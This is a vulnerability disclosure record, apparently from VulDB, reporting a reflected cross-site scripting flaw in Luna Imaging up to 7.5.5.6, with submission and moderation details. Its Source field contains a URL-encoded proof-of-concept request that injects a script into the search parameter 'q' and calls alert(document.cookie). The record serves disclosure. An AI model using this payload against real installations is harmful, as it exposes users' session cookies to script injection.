| Title | Luna Imaging, Inc. Luna Imaging 7.5.5.x Cross Site Scripting |
|---|
| Description | Hi,
I identified a vulnerability in luna imagic inc, where it was possible to trigger an xss via get.
https://software.lunaimaging.com/software/x.x.x.x/
[email protected] |
|---|
| Source | ⚠️ https://example.com/luna/servlet/view/search?search=Enviar&cat=0&q=%22%27%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3Casd%3E&dateRangeStart=&dateRangeEnd=%3Casd%3E&annotSearch=annotSearch |
|---|
| User | chor4o (UID 52584) |
|---|
| Submission | 06/07/2025 01:33 (10 months ago) |
|---|
| Moderation | 06/19/2025 08:11 (12 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 313272 [Luna Imaging up to 7.5.5.6 search q cross site scripting] |
|---|
| Points | 15 |
|---|